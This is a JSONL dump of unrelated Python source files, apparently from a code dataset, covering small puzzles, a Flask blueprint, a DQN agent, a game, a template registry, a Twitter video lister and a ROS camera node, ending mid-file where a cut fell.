+{"seq_id":"580014003","text":"#!/usr/bin/python3\n\n\ndef spoil(rows,cols,field,row1,col1,row2,col2):\n\tnewfield = []\n\tfor i in range(rows):\n\t\trow = []\n\t\tfor j in range(cols):\n\t\t\trow.append(field[i][j])\n\t\tnewfield.append(row)\n\n\tnewfield[row1][col1] = \"X\"\n\tnewfield[row2][col2] = \"X\"\n\n\tfor i in range(rows):\n\t\tfor j in range(cols):\n\t\t\tif field[i][j] != \"O\":\n\n\t\t\t\ti_copy = i + 1\n\t\t\t\tif i_copy >= 0 and i_copy < rows:\n\t\t\t\t\tnewfield[i_copy][j] = \"X\"\n\t\t\t\t\n\t\t\t\ti_copy = i - 1\n\t\t\t\tif i_copy >= 0 and i_copy < rows :\n\t\t\t\t\tnewfield[i_copy][j] = \"X\"\n\n\t\t\t\tj_copy = j + 1\n\t\t\t\tif j_copy >= 0 and j_copy < cols:\n\t\t\t\t\tnewfield[i][j_copy] = \"X\"\n\n\t\t\t\tj_copy = j - 1\n\t\t\t\tif j_copy >= 0 and j_copy < cols:\n\t\t\t\t\tnewfield[i][j_copy] = \"X\"\t\t\t\t\t\n\n\n\n\treturn newfield\n\ndef PrintField(matrix,rows,cols):\n\tfor i in range(rows):\n\t\t\tfor j in range(cols):\n\t\t\t\tprint(matrix[i][j],end=\" \")\n\t\t\tprint(\"\")\n\treturn\n\n\n\n\n\nrows,cols,R = input().split()\nrows = int(rows) # rows\ncols = int(cols) # cols\nR = int(R)\nfield = []\nfor i in range(rows):\n\trow = []\n\tfor j in range(cols):\n\t\trow.append(\"O\")\n\tfield.append(row)\n\n\t\t\t \t\n\nrow1,col1 = input().split()\nrow2,col2 = input().split()\n\nrow1 = int(row1)\nrow2 = int(row2)\ncol1 = int(col1)\ncol2 = int(col2)\n\nfield[row1][col1] = \"X\"\nfield[row2][col2] = \"X\"\n\n\n\nfor i in range(R):\n\tfield = spoil(rows,cols,field,row1,col1,row2,col2)\ncount = 0\nfor i in range(rows):\n\tfor j in range(cols):\n\t\tif field[i][j] == \"O\":\n\t\t\tcount+=1\nPrintField(field,rows,cols)\t\nprint(count)\n","sub_path":"boyanM-Strawberry/strawberry.py","file_name":"strawberry.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"436458737","text":"import os\nx = 0\n\nprint (\"Please enter a directory.\")\nfile_path = str(input(\"> \"))\ndef file_size(file):\n    size = os.path.getsize(file)\n    print(size)\n\nfile_size(file_path)\n\nprint (\"See more stats?\")\nwhile x < 1000:\n    decision = str(input(\"y/n > \"))\n    if decision == \"y\":\n        print 
(\"This feature has not been added yet. Sorry!\")\n break\n elif decision == \"n\":\n print (\"Good. We can't tell you anything anyway.\")\n break\n else:\n print(\"I'm sorry. I didn't understand that\")\n","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"107701293","text":"from anagram_sets import find_all_anagrams\n\ndef word_distance(word1, word2):\n \"\"\"returns the number of differences between two words\n\n word1, word2: string\n return: int\n \"\"\"\n assert(len(word1) == len(word2))\n count = 0\n for l1, l2 in zip(word1, word2):\n if l1 != l2:\n count += 1\n return count\n\n\ndef print_all_metathesis_pairs(d):\n '''prints all pairs of words that can be generated by swapping two letters\n\n d: map from word to all its anagrams\n '''\n for anagrams in d.values():\n for word1 in anagrams:\n for word2 in anagrams:\n if word1 < word2 and word_distance(word1, word2) == 2:\n print(word1, word2)\n\n\nif __name__ == '__main__':\n all_anagrams = find_all_anagrams('words.txt')\n\n print_all_metathesis_pairs(all_anagrams)\n\n\n","sub_path":"metathesis.py","file_name":"metathesis.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126765516","text":"import logging\n\nfrom collections import namedtuple\n\nfrom flask import Blueprint, render_template, request, abort, redirect, url_for\n\nfrom . import db\nfrom .db import session_scope\n\nlogger = logging.getLogger(\"quoted-forsooth.relation\")\n\nrelation = Blueprint('relation', __name__)\n\n@relation.route('/relation_type/add/')\n@relation.route('/relation_type/<int:db_id>/edit/')\ndef add_type_index(db_id=None):\n with session_scope() as session:\n if db_id:\n relation_type = session.query(db.SourceRelationType).get(db_id)\n else:\n relation_type = None\n return render_template('relation/relation_type_edit.html', relation_type=relation_type)\n\ndef extract_relations(source, nodes=None, edges=None, depth=0, maxdepth=None, characters=False, characters_only=False, character_level='all', own_characters_only=False):\n if not nodes:\n nodes = set()\n if not edges:\n edges = set()\n if source in nodes:\n return nodes, edges\n else:\n nodes.add(source)\n if not characters_only:\n edges |= source.relations\n if characters or characters_only:\n if character_level == 'main':\n edges |= set(a for a in source.appearances if not a.type or a.type.name == 'Main')\n nodes |= set(a.character for a in source.appearances if not a.type or a.type.name == 'Main')\n elif character_level == 'sub':\n edges |= set(a for a in source.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n nodes |= set(a.character for a in source.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n else:\n edges |= set(source.appearances)\n nodes |= set(source.characters)\n\n if own_characters_only:\n if character_level == 'main':\n edges |= set(a for c in source.characters for a in c.appearances if not a.type or a.type.name == 'Main')\n nodes |= set(a.source for c in source.characters for a in c.appearances if not a.type or a.type.name == 'Main')\n elif character_level == 'sub':\n edges |= set(a for c in source.characters for a in c.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n nodes |= set(a.source for c in source.characters for a in c.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n else:\n edges |= 
set(a for c in source.characters for a in c.appearances)\n nodes |= set(a.source for c in source.characters for a in c.appearances)\n else:\n if not (maxdepth and depth >= maxdepth):\n if character_level == 'main':\n for s in set(s for a in source.appearances if not a.type or a.type.name == 'Main' for s in a.character.sources):\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n elif character_level == 'sub':\n for s in set(s for a in source.appearances if not a.type or a.type.name in ('Main', 'Sub') for s in a.character.sources):\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n else:\n for s in set(s for c in source.characters for s in c.sources):\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n if not (characters_only or (maxdepth and depth >= maxdepth)):\n for s in set([s['source'] for sub in source.relations_dict.values() for s in sub]):\n if own_characters_only:\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters=False, characters_only=characters_only, character_level=character_level)\n else:\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n return nodes, edges\n\n@relation.route('/source/<int:db_id>/visualize_relations/')\ndef visualize(db_id):\n with session_scope() as session:\n source = session.query(db.Source).get(db_id)\n if not source:\n abort(404)\n characters = 'false' not in request.args.getlist('characters')\n characters_only = 'only' in request.args.getlist('characters')\n own_characters_only = 'own' in request.args.getlist('characters')\n character_level = (\n 'all' if 'all' in request.args.getlist('characters') else\n 'sub' if 'sub' in request.args.getlist('characters') else\n 'main')\n depth = request.args.get('depth', type=int, default=0)\n nodes, edges = extract_relations(\n source,\n characters=characters,\n characters_only=characters_only,\n own_characters_only=own_characters_only,\n character_level=character_level,\n maxdepth=depth)\n if 'series' in request.args:\n if source.series:\n nodes |= set(source.series.sources)\n RelType = namedtuple('RelType', ['name'])\n Rel = namedtuple('Rel', ['left_source_id', 'right_source_id', 'relation_type'])\n s = sorted(source.series.sources, key=lambda s: s.date)\n edges |= set([Rel(s[i].id, s[i+1].id, RelType('series')) for i in range(len(s) - 1)])\n return render_template('relation/relation_visualize.html', source=source, nodes=nodes, edges=edges)\n\n@relation.route('/relation_type/add/', methods=['POST'])\n@relation.route('/relation_type/<int:db_id>/edit/', methods=['POST'])\ndef add_type(db_id=None):\n with session_scope() as session:\n if 'db_id' in request.form:\n if db_id and db_id != request.form.get('db_id', type=int):\n raise ValueError(\"POSTed relation type ID does not match URL.\")\n relation_type = session.query(db.SourceRelationType).get(int(request.form['db_id']))\n else:\n relation_type = db.SourceRelationType()\n\n relation_type.name = request.form['name']\n relation_type.left_list_name = request.form['left_list_name']\n relation_type.right_list_name = request.form['right_list_name']\n relation_type.ltr_format = request.form['ltr_format']\n relation_type.rtl_format = request.form['rtl_format']\n\n session.add(relation_type)\n\n return redirect(url_for('index'))\n\n@relation.route('/relation/add/')\n@relation.route('/relation/<int:db_id>/edit/')\ndef add_index(db_id=None):\n with session_scope() as 
session:\n relation_types = session.query(db.SourceRelationType).order_by(db.SourceRelationType.name).all()\n if db_id:\n relation = session.query(db.SourceRelation).get(db_id)\n else:\n relation = None\n return render_template('relation/relation_edit.html', relation_types=relation_types, relation=relation)\n\n@relation.route('/series_relation/add/')\n@relation.route('/series_relation/<int:db_id>/edit/')\ndef add_series_index(db_id=None):\n with session_scope() as session:\n relation_types = session.query(db.SourceRelationType).order_by(db.SourceRelationType.name).all()\n series = session.query(db.Series).order_by(db.Series.name).all()\n if db_id:\n relation = session.query(db.SeriesRelation).get(db_id)\n else:\n relation = None\n return render_template('relation/series_relation_edit.html', relation_types=relation_types, relation=relation, series=series)\n\n@relation.route('/relation/add/', methods=['POST'])\n@relation.route('/relation/<int:db_id>/edit/', methods=['POST'])\ndef add(db_id=None):\n with session_scope() as session:\n left = session.query(db.Source).get(int(request.form['left']))\n right = session.query(db.Source).get(int(request.form['right']))\n relation_type = session.query(db.SourceRelationType).get(int(request.form['relation_type']))\n if 'db_id' in request.form:\n if db_id and db_id != request.form.get('db_id', type=int):\n raise ValueError(\"POSTed relation ID does not match URL.\")\n relation = session.query(db.SourceRelation).get(int(request.form['db_id']))\n else:\n relation = db.SourceRelation()\n relation.left_source = left\n relation.right_source = right\n relation.relation_type = relation_type\n session.add(relation)\n session.flush()\n\n return redirect(url_for('.view', db_id=relation.id))\n\n@relation.route('/series_relation/add/', methods=['POST'])\n@relation.route('/series_relation/<int:db_id>/edit/', methods=['POST'])\ndef series_add(db_id=None):\n with session_scope() as session:\n left = session.query(db.Series).get(int(request.form['left']))\n right = session.query(db.Series).get(int(request.form['right']))\n relation_type = session.query(db.SourceRelationType).get(int(request.form['relation_type']))\n if 'db_id' in request.form:\n if db_id and db_id != request.form.get('db_id', type=int):\n raise ValueError(\"POSTed series relation ID does not match URL.\")\n relation = session.query(db.SeriesRelation).get(int(request.form['db_id']))\n else:\n relation = db.SeriesRelation()\n relation.left_series = left\n relation.right_series = right\n relation.relation_type = relation_type\n session.add(relation)\n session.flush()\n\n return redirect(url_for('.series_view', db_id=relation.id))\n\n@relation.route('/relation/<int:db_id>/')\ndef view(db_id):\n with session_scope() as session:\n rel = session.query(db.SourceRelation).get(db_id)\n if not rel:\n abort(404)\n return render_template('relation/relation_view.html', relation=rel)\n\n@relation.route('/series_relation/<int:db_id>/')\ndef series_view(db_id):\n with session_scope() as session:\n rel = session.query(db.SeriesRelation).get(db_id)\n if not rel:\n abort(404)\n return render_template('relation/series_relation_view.html', relation=rel)\n","sub_path":"relation.py","file_name":"relation.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36585316","text":"from Agents.DQN.BaseDQN import BaseDQNAgent\nfrom Agents.DQN.DQN import DQNAgent\n\nfrom Agents.Core.ReplayMemory import ReplayMemory, Transition\n\nfrom Agents.Core.ReplayMemoryReward import 
ReplayMemoryReward\nfrom Agents.Core.PrioritizedReplayMemory import PrioritizedReplayMemory\n\nimport random\nimport torch\nimport torch.optim\nimport numpy as np\nfrom enum import Enum\nimport simplejson as json\nimport os\nimport math\nimport pickle\n\n\nclass StackedDQNAgent(DQNAgent):\n\n def __init__(self, config, policyNet, targetNet, env, optimizer, netLossFunc, nbAction, stateProcessor=None,\n experienceProcessor=None, timeIndexMap=None):\n\n self.policyNets = policyNet\n self.targetNets = targetNet\n self.optimizers = optimizer\n\n super(StackedDQNAgent, self).__init__(config, policyNet, targetNet, env, optimizer, netLossFunc, nbAction,\n stateProcessor, experienceProcessor)\n self.policyNet = None\n self.targetNet = None\n self.optimizer = None\n self.timeIndexMap = timeIndexMap\n self.init_memory()\n\n def initialization(self):\n # move model to correct device\n for i in range(len(self.policyNets)):\n self.policyNets[i] = self.policyNets[i].to(self.device)\n\n # in case targetNet is None\n for i in range(len(self.targetNets)):\n if self.targetNets[i] is not None:\n self.targetNets[i] = self.targetNets[i].to(self.device)\n\n self.dirName = 'Log/'\n if 'dataLogFolder' in self.config:\n self.dirName = self.config['dataLogFolder']\n if not os.path.exists(self.dirName):\n os.makedirs(self.dirName)\n\n self.identifier = ''\n self.epIdx = 0\n self.learnStepCounter = 0 # for target net update\n self.globalStepCount = 0\n self.losses = []\n self.rewards = []\n self.nStepBuffer = []\n\n self.individualStepCounts = [0 for _ in range(len(self.policyNets))]\n\n def init_memory(self):\n\n self.memories = [ReplayMemory(self.memoryCapacity) for _ in range(len(self.policyNets))]\n\n def store_experience(self, state, action, nextState, reward, info):\n\n if self.experienceProcessor is not None:\n state, action, nextState, reward = self.experienceProcessor(state, action, nextState, reward, info)\n # caution: using multiple step forward return can increase variance\n # if it is one step\n\n timeStep = self.timeIndexMap[state['timeStep']]\n transition = Transition(state, action, nextState, reward)\n self.memories[timeStep].push(transition)\n\n def work_before_step(self, state):\n timeStep = self.timeIndexMap[state['timeStep']]\n\n self.epsThreshold = self.epsilon_by_step(self.individualStepCounts[timeStep])\n\n\n\n def update_net(self, state, action, nextState, reward, info):\n\n # first store memory\n\n self.store_experience(state, action, nextState, reward, info)\n\n\n if self.hindSightER and nextState is not None and self.globalStepCount % self.hindSightERFreq == 0:\n stateNew, actionNew, nextStateNew, rewardNew = self.env.getHindSightExperience(state, action, nextState, info)\n if stateNew is not None:\n self.store_experience(stateNew, actionNew, nextStateNew, rewardNew, info)\n\n\n # update net with specified frequency\n if self.globalStepCount % self.netUpdateFrequency == 0:\n # sample experience\n\n for i in range(len(self.memories) - 1, -1, -1):\n if len(self.memories[i]) < self.trainBatchSize:\n continue\n\n transitions_raw = self.memories[i].sample(self.trainBatchSize)\n self.policyNet = self.policyNets[i]\n self.optimizer = self.optimizers[i]\n\n if self.netUpdateOption == 'targetNet' or self.netUpdateOption == 'doubleQ':\n if i < (len(self.memories) - 1):\n self.targetNet = self.targetNets[i + 1]\n else:\n self.targetNet = self.targetNets[i]\n if self.netUpdateOption == 'policyNet':\n raise NotImplementedError\n\n loss = self.update_net_on_transitions(transitions_raw, self.netLossFunc, 
1,\n updateOption=self.netUpdateOption, netGradClip=self.netGradClip,\n info=info)\n\n if self.globalStepCount % self.lossRecordStep == 0:\n self.losses.append([self.globalStepCount, self.epIdx, loss])\n\n # caution! it is targetNets[i] not targetNets[i + 1]\n if self.learnStepCounter % self.targetNetUpdateStep == 0:\n self.targetNets[i].load_state_dict(self.policyNet.state_dict())\n\n self.learnStepCounter += 1\n\n def save_all(self):\n prefix = self.dirName + self.identifier + 'Finalepoch' + str(self.epIdx)\n torch.save({\n 'epoch': self.epIdx,\n 'globalStep': self.globalStepCount,\n 'model_state_dict': [net.state_dict() for net in self.policyNets],\n 'optimizer_state_dict': [opt.state_dict() for opt in self.optimizers]\n }, prefix + '_checkpoint.pt')\n with open(prefix + '_memory.pickle', 'wb') as file:\n pickle.dump(self.memories, file)\n self.saveLosses(prefix + '_loss.txt')\n self.saveRewards(prefix + '_reward.txt')\n\n def save_checkpoint(self):\n prefix = self.dirName + self.identifier + 'Epoch' + str(self.epIdx)\n self.saveLosses(prefix + '_loss.txt')\n self.saveRewards(prefix + '_reward.txt')\n with open(prefix + '_memory.pickle', 'wb') as file:\n pickle.dump(self.memories, file)\n\n torch.save({\n 'epoch': self.epIdx,\n 'globalStep': self.globalStepCount,\n 'model_state_dict': [net.state_dict() for net in self.policyNets],\n 'optimizer_state_dict': [opt.state_dict() for opt in self.optimizers]\n }, prefix + '_checkpoint.pt')\n\n def load_checkpoint(self, prefix):\n # self.loadLosses(prefix + '_loss.txt')\n # self.loadRewards(prefix + '_reward.txt')\n with open(prefix + '_memory.pickle', 'rb') as file:\n self.memories = pickle.load(file)\n\n checkpoint = torch.load(prefix + '_checkpoint.pt')\n self.epIdx = checkpoint['epoch']\n self.globalStepCount = checkpoint['globalStep']\n for i in range(len(self.policyNets)):\n self.policyNets[i].load_state_dict(checkpoint['model_state_dict'][i])\n self.targetNets[i].load_state_dict(checkpoint['model_state_dict'][i])\n self.optimizers[i].load_state_dict(checkpoint['optimizer_state_dict'][i])","sub_path":"Agents/StackedDQN/StackedDQN.py","file_name":"StackedDQN.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241635434","text":"import arcade\r\nimport random\r\nfrom wall import Wall\r\n\r\nclass Coin:\r\n\r\n coin_list = arcade.SpriteList()\r\n\r\n def __init__(self, x, y, image_path, SPRITE_SCALING):\r\n self.x = x\r\n self.y = y\r\n self.coin_sprite = arcade.Sprite(image_path, SPRITE_SCALING)\r\n self.coin_sprite.center_x = self.x\r\n self.coin_sprite.center_y = self.y\r\n\r\n def getSprite(self):\r\n return self.coin_sprite\r\n\r\n\r\n def placeCoins(NUMBER_OF_COINS):\r\n for i in range(NUMBER_OF_COINS):\r\n\r\n coin = Coin(0, 0, \"images\\\\coin.png\", 1)\r\n\r\n # Boolean variable if we successfully placed the coin\r\n coin_placed_successfully = False\r\n\r\n # Keep trying until success\r\n while not coin_placed_successfully:\r\n # Position the coin\r\n coin.getSprite().center_x = random.randrange(800)\r\n coin.getSprite().center_y = random.randrange(600)\r\n\r\n # See if the coin is hitting a wall\r\n wall_hit_list = arcade.check_for_collision_with_list(coin.getSprite(), Wall.wall_list)\r\n\r\n # See if the coin is hitting another coin\r\n coin_hit_list = arcade.check_for_collision_with_list(coin.getSprite(), Coin.coin_list)\r\n\r\n if len(wall_hit_list) == 0 and len(coin_hit_list) == 0:\r\n # It is!\r\n coin_placed_successfully = 
True\r\n\r\n # Add the coin to the lists\r\n Coin.coin_list.append(coin.getSprite())\r\n","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544918008","text":"import base64\nimport gridfs\nimport logging\nimport os\nimport pymongo\nimport shutil\nimport typing\nimport uuid\n\nfrom document_worker.consts import TemplateField, FormatField, TemplateAssetField, TemplateFileField\nfrom document_worker.documents import DocumentFile\nfrom document_worker.templates.formats import Format\n\n\nclass TemplateException(Exception):\n\n def __init__(self, template_id: str, message: str):\n self.template_id = template_id\n self.message = message\n\n\nclass Asset:\n\n def __init__(self, asset_uuid: str, filename: str, content_type: str,\n data: bytearray):\n self.asset_uuid = asset_uuid\n self.filename = filename\n self.content_type = content_type\n self.data = data\n\n @property\n def data_base64(self) -> str:\n return base64.b64encode(self.data).decode('ascii')\n\n @property\n def src_value(self):\n return f'data:{self.content_type};base64,{self.data_base64}'\n\n\nclass Template:\n\n META_REQUIRED = [TemplateField.ID,\n TemplateField.NAME,\n TemplateField.METAMODEL_VERSION,\n TemplateField.FORMATS,\n TemplateField.FILES]\n\n def __init__(self, config, template_dir: str, template_id: str, template_data: dict, mongo_db):\n self.config = config\n self.template_dir = template_dir\n self.mongo_db = mongo_db\n self.template_id = template_id\n logging.info(f'Loading {template_id}')\n self.metadata = template_data\n logging.info(f'Verifying {template_id}')\n self._verify_metadata()\n self.name = self.metadata[TemplateField.NAME]\n logging.info(f'Setting up formats for template {self.template_id}')\n self.formats = dict()\n self.assets = dict()\n self.download_template_files()\n self.download_template_assets()\n\n @property\n def files(self):\n return self.metadata[TemplateField.FILES]\n\n def raise_exc(self, message: str):\n raise TemplateException(self.template_id, message)\n\n def _verify_metadata(self):\n for required_field in self.META_REQUIRED:\n if required_field not in self.metadata:\n self.raise_exc(f'Missing required field {required_field}')\n\n def fetch_asset(self, filename: str) -> typing.Optional[Asset]:\n logging.info(f'Fetching asset \"{filename}\"')\n if filename in self.assets.keys():\n return self.assets[filename]\n found_asset = None\n for asset in self.metadata.get(TemplateField.ASSETS, []):\n if asset.get(TemplateAssetField.FILENAME, '') == filename:\n found_asset = asset\n if found_asset is None:\n logging.warning(f'Asset \"{filename}\" not found in template')\n return None\n assets_fs = gridfs.GridFS(self.mongo_db, self.config.mongo.assets_fs_collection)\n file = assets_fs.find_one({'filename': found_asset[TemplateAssetField.UUID]})\n if file is None:\n logging.error(f'Asset \"{filename}\" not found in GridFS')\n return None\n return Asset(\n asset_uuid=found_asset[TemplateAssetField.UUID],\n filename=found_asset[TemplateAssetField.FILENAME],\n content_type=found_asset[TemplateAssetField.CONTENT_TYPE],\n data=file.read()\n )\n\n def asset_path(self, filename: str) -> str:\n return os.path.join(self.template_dir, filename)\n\n def store_file(self, filename, data, **kwargs):\n full_path = os.path.join(self.template_dir, filename)\n os.makedirs(os.path.dirname(full_path), exist_ok=True)\n with open(full_path, **kwargs) as f:\n f.write(data)\n\n def 
download_template_files(self):\n logging.info(f'Storing files of template {self.template_id} locally')\n for template_file in self.files:\n filename = template_file[TemplateFileField.FILENAME]\n data = template_file[TemplateFileField.CONTENT]\n self.store_file(filename, data, mode='w', encoding='utf-8')\n\n def download_template_assets(self):\n logging.info(f'Storing assets of template {self.template_id} locally')\n assets_fs = gridfs.GridFS(self.mongo_db, self.config.mongo.assets_fs_collection)\n for asset in self.metadata.get(TemplateField.ASSETS, []):\n filename = asset[TemplateAssetField.FILENAME]\n file = assets_fs.find_one({'filename': asset[TemplateAssetField.UUID]})\n if file is None:\n logging.error(f'Asset \"{TemplateAssetField.FILENAME}\" not found in GridFS')\n else:\n data = file.read()\n self.store_file(filename, data, mode='wb')\n\n def prepare_format(self, format_uuid: uuid.UUID) -> bool:\n str_uuid = str(format_uuid)\n for format_meta in self.metadata[TemplateField.FORMATS]:\n if str_uuid == format_meta[FormatField.UUID]:\n try:\n self.formats[format_uuid] = Format(self, format_meta)\n except Exception as e:\n logging.error(f'Format {str_uuid} of template {self.template_id} '\n f'cannot be loaded - {e}')\n return True\n return False\n\n def has_format(self, format_uuid: uuid.UUID) -> bool:\n return any(map(\n lambda f: f[FormatField.UUID] == format_uuid,\n self.metadata[TemplateField.FORMATS]\n ))\n\n def __getitem__(self, format_uuid: uuid.UUID) -> Format:\n return self.formats[format_uuid]\n\n def render(self, format_uuid: uuid.UUID, context: dict) -> DocumentFile:\n return self[format_uuid].execute(context)\n\n\nclass TemplateRegistry:\n\n def __init__(self, config, workdir):\n self.config = config\n self.workdir = workdir\n self.mongo_client = pymongo.MongoClient(**self.config.mongo.mongo_client_kwargs)\n self.mongo_db = self.mongo_client[self.config.mongo.database]\n self.mongo_collection = self.mongo_db[self.config.mongo.templates_collection]\n\n def get_template(self, template_id: str) -> typing.Optional[Template]:\n template_data = self.mongo_collection.find_one({TemplateField.ID: template_id})\n\n template_dir = os.path.join(self.workdir, template_id.replace(':', '_'))\n if os.path.exists(template_dir):\n shutil.rmtree(template_dir)\n os.mkdir(template_dir)\n\n return None if template_data is None else Template(\n self.config, template_dir, template_id, template_data, self.mongo_db\n )\n","sub_path":"document_worker/templates/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199153860","text":"# -*- coding:utf-8 -*-\n\n# from fractions import Fraction\n# import random\n#\n# print(Fraction(4, 5))\n# print(Fraction(1, 2))\n# print(Fraction('0.5'))\n# print(7 * Fraction(0.5))\n#\n#\n# def password_generator(count_char=8):\n# arr = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n# 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n# 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',\n# 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',\n# '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '_', '-', '+']\n# password = []\n# for i in range(count_char):\n# password.append(random.choice(arr))\n# return \"\".join(password)\n#\n#\n# print(password_generator(24))\n#\n# p = 'Python'\n# s = 'J' + p[1:]\n# print(p)\n# print(s)\n\nhtml = \"\"\"\n%(title)s\n\n
<h1>%(h1)s</h1>\n<p>\n%(content)s\n</p>
\n\n\n\"\"\"\n\narr = {\"title\": \"Название документа\",\n \"h1\": \"Заголовок документа\",\n \"content\": \"Контент документа\"}\n\nprint(html % arr)\ninput()\n","sub_path":"example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"130546893","text":"import os\r\nimport time\r\nimport json\r\nimport tweepy\r\nimport logging\r\nimport configparser\r\n\r\nclass USERLOG():\r\n def __init__(self,level=2,filename='log.txt'):\r\n self.logger = logging.getLogger(__name__)\r\n self.logger.setLevel(level=logging.INFO)\r\n handler = logging.FileHandler(filename)\r\n handler.setLevel(logging.INFO)\r\n handler.setFormatter(logging.Formatter('[%(asctime)s][%(levelname)s]: %(message)s'))\r\n self.logger.addHandler(handler)\r\n\r\nlog = USERLOG(filename=time.strftime('log_%Y-%m-%d_%H-%M.txt')).logger\r\n\r\nconfig = configparser.ConfigParser()\r\npath = os.path.split(os.path.realpath(__file__))[0] + '/config.ini'\r\nconfig.read(path)\r\n\r\nclass TweeVideo():\r\n def __init__(self):\r\n section = 'Twitter'\r\n consumer_key = config.get(section, 'consumer_key')\r\n consumer_secret = config.get(section, 'consumer_secret')\r\n access_token = config.get(section, 'access_token')\r\n access_token_secret = config.get(section, 'access_token_secret')\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n self.tweepyapi = tweepy.API(auth, proxy=config.get('Requests', 'proxy'))\r\n self.threadList = []\r\n self.linkList = []\r\n def getUserVideoList(self, id):\r\n userVideoList = []\r\n for status in tweepy.Cursor(self.tweepyapi.user_timeline, id=id).items():\r\n try:\r\n url = status._json['extended_entities']['media'][0]['expanded_url'].split('/')[-3]\r\n if not (url in userVideoList):\r\n userVideoList.append(url)\r\n except:\r\n pass\r\n return userVideoList\r\n\r\ndef main():\r\n self = TweeVideo()\r\n tweeidList = []\r\n tweevideos = {}\r\n with open('tweeusers.txt', 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n line = line.strip('\\n')\r\n tweeidList.append(line)\r\n if len(tweeidList) == 0:\r\n log.error('获取本地用户名列表失败!')\r\n else:\r\n for tweeid in tweeidList:\r\n videos = self.getUserVideoList(tweeid)\r\n if len(videos) == 0:\r\n log.error('获取用户视频列表失败!')\r\n else:\r\n tweevideos[tweeid] = videos\r\n log.info('获取 ' + tweeid + ' 的原始视频列表成功!共 ' + str(len(videos)) + ' 条记录...')\r\n time.sleep(int(config.get('Requests', 'sleep')))\r\n with open('tweevideos.json', 'w') as f:\r\n json.dump(tweevideos, f)\r\n\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except Exception as e:\r\n log.error(e)\r\n","sub_path":"tweevideos.py","file_name":"tweevideos.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"492612149","text":"#!/usr/bin/env python\n\nimport sys, time\nimport numpy as np\nimport cv2\n\nimport roslib\nimport rospy\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\n\nclass OpenCvCapture(object):\n def __init__(self):\n # capture from the LAST camera in the system\n # presumably, if the system has a built-in webcam it will be the first\n for i in reversed(range(10)):\n print(\"Testing for presense of camera #{}\".format(i))\n cv2_cap = cv2.VideoCapture(i)\n if cv2_cap.isOpened():\n break\n\n if not cv2_cap.isOpened():\n print(\"Camera not found!\")\n 
exit(1)\n\n self.cv2_cap = cv2_cap\n\n\ndef publish():\n image_pub = rospy.Publisher(\"/infrared\", Image)\n bridge = CvBridge()\n camera = OpenCvCapture()\n\n print(\"Running, ESC or Ctrl-c to exit...\")\n while not rospy.is_shutdown():\n ret, img = camera.cv2_cap.read()\n\n if ret == False:\n print(\"Error reading image\")\n break\n\n resized_image = cv2.resize(img, (640, 480))\n\n try:\n image_pub.publish(bridge.cv2_to_imgmsg(resized_image, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n\n\ndef main(args):\n rospy.init_node('sensors', anonymous=True)\n try:\n publish()\n except KeyboardInterrupt:\n print(\"Shutting down sensors.py node\")\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"nodes/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"271576027","text":"import sys\nimport re\nimport random\nimport psycopg2\nimport logging\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.sql import text\nfrom sqlalchemy import pool\n\nfrom findex_gui.bin.config import config\nfrom findex_gui.orm.models import BASE\nfrom findex_gui.bin.config import config\nfrom findex_common.exceptions import DatabaseException, ElasticSearchException\n\n\nclass Database(object):\n def __init__(self):\n \"\"\"Connects to the Postgres database.\"\"\"\n self.engine = None\n self.session = None\n self.dsn = config(\"findex:database:connection\")\n\n self.pool = pool.QueuePool(creator=self._getconn,\n max_overflow=1,\n pool_size=300,\n echo=False) # config(\"findex:findex:debug\")\n\n def connect(self, 